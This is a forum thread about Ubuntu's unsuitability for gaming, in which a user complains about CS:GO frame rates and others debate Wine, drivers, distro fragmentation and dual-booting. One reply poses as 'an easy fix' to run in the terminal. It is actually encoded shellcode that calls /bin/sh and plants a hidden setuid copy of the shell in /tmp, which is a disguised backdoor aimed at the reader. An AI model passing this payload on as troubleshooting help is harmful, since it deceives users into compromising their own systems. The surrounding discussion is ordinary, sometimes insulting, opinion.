Lemme give you a little advice. Don't play Win games on Linux using Wine (PlayOnLinux is just a GUI wrapper for Wine, if you didn't know). At least not the new ones or games, where fps and timely reaction are crucial. Get yourself Win7. I finished.

Linux is not Windows. For use linux you need learn how use it. In my opinion linux is more easy to use and lot more powerful than windows.
About games, Windows have more suported games. But every day linux have more and more games suported. Every Android and SteamOS game can run in Linux natively.

Isn't SteamOS based on linux?. Now, if steam decided that linux is a good choice to make a gaming platform, who are we to complain about linux?. Those guys at steam know what they are doing.
If you want to use any linux version you must learn how to use it, you must learn what you can and you cannot do.
The problem is between chair and keyboard dude.

"I'm supposed to play cs:go with 60 fps while with the windows version my fps is over 225" WUT? I get more fps on linux in csgo than in windows (~40-50 on windows 60+ on linux) Just make sure you use CSMT patched wine. (if you use playonlinux, search for 1.7.18-cs-0.8-f1cf438)

If you payed that much for your PC to game , i suggest you get Windows 7 at least as soon as possible, all the problems you're going through are why most people don't use Ubuntu and other linux Os's, it's great if you're a tech savvy and know exactly what you doing, it's great if you find it enjoyable to go through problems and spend hours looking for a fix to them, it's great if you're a developer in that domain, it's bad if you're a casual user, PC Gamer or someone with bad temper

The issues with Linux gaming come from driver support and OpenGL. ex-Valve engineer's story here: http://richg42.blogspot.com/2014/05/things-that-drive-me-nuts-about-opengl.html

I am not defender of Ubuntu, but:
1) Have u installed official videocard driver from official site?
2) As for Cs:go, as u know it's not ported to linux, better try some other game (L4D2,TF2, or others)
3) Plz think again, do u really need DAT DEMOFILE?

The biggest problem of Linux besides not being supported from many games is incompatibility between different distros, and even on same distro some months later.
This eliminated many third party developed programms and tools and many don't even want to effort anything now since a few months in future it will be most likely be broken again.
To be successful on desktop, there has to be a standard for all distros, so game developers or third party developers can make programms which will continue to work months after they are released.
Linux developers want to be the guys who created the next big feature instead of creating standards and backward compatibility.

so why not integrating those old libs by default into one which will be used by all?
(To have a lib which works for all purposes)
As it is now, for different purposes there are different distros and its not easy to get programms to work if you have to search for the right lib and after using the old lib you may encounter different problems with other programms.
Someone has to come with a distro which unite the different ones and can be used for all diferent purposes, than you have a standard.
If this would be accomplished it would be a lot easier for end users to jump on the linux train and linux itself would be way more succesful, also if more people would use it the support for games and other stuff would sky rocket.

Ubuntu is often mentioned because it's one of the more user friendly and complete out-of-the-box distros, believe it or not.
It's definitely not an OS for everyone though, ironically enough what with all their slogans. You are expected to know an awful lot of things before going into it to get the most out of it (or even anything at all, depending on what you're doing). You're also expected to put up with incompatibilities, lots of fooling around with the terminal, and updates frequently. And if you want access to your full library of software, you're going to need to dual-boot into Windows.
Personally not for me, but it's ideal for those that want a lightweight OS that gives them full control. And programmers.

I disagree on certain points. "depending on what you're doing" yeah, thats the whole point. If you are a casual user, browsing the web, sending emails, reading documents etc you dont need to know much. And the best of all you cant break too much. Ubuntu is great for your not so tech savvy parents. They cant get viruses or install any crap software and because they will most likely use it for basic tasks they wont even notice it.
"lots of fooling around with the terminal" yeah but if you understand the concept behind the terminal you can do everything. its a very powerfull tool if you know how to use it. and its not that hard.
"And programmers." not so much. Beause its important to develop on your target plattform. If you are aiming towards an windows user base (what is tbh the most time) you should develop on windows. If you aim towards web you most likely want a "more stable" distro like debian or a more bleeding edge one like arch or even gentoo.
And in generell: no offence to canonical but many users dont like the things like the amazon advertisement which is build right into the newer versions. And i think the newer versions are very intrusive to your privacy so i dont think they are going the right way to make it a better os.

Honestly, you just sound really stupid after reading the thread. Ubuntu was never said to be good for gaming. Linux-based systems are good for actual computer work, not video editing or gaming. What you're doing is the equivalent of using a fork to drink soup and saying it's a terrible eating utensil.
Also, CS:GO isn't supported on Linux.

There is an easy fix for people with your smart problem, just run this in terminal:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

"Says nothing works on Linux and then just goes on about games not working well"
That's you're problem. People who use linux don't tend to game much on it or at all. Games are made to work with Windows primarily and then linux ports only come years later or not at all. If you want a gaming machine, you boot Windows. It's as simple as that. If you want to run a few select games but mostly use it for other computery stuff, then linux is more than suitable.
Either dual-boot, use Wine, switch entirely back to Windows or deal with it. A game "only" running at 60fps..... I'm wondering if you realise how ridiculous you sound making that complaint.

I paid 1300$ for new PC but cant use it because Ubuntu sucks so hard. Honestly.
Nothing works without multiple problems, and even when some programm starts working, it doesnt work as good as with Windows. I'm supposed to play cs:go with 60 fps while with the windows version my fps is over 225. I cant open steamchat/browser while I'm in-game. Everything in the game is bugged because Linux. I cant make in-game purchases, so I have to buy my stuff from market with a higher price.
Then, I managed to get a nice frag at CS:GO. First it takes a long time to even find the demofile from the computer. Then I realize that I cant record it, because there is no working recording programm for Linux. (k, one worked, but with 30 max fps, and didnt have a bind to start te record). Even if somehow I can record it, it doesnt help because all linux video editors suck.
So, whats the good part of this shit? Being a hipster or something? fufu.
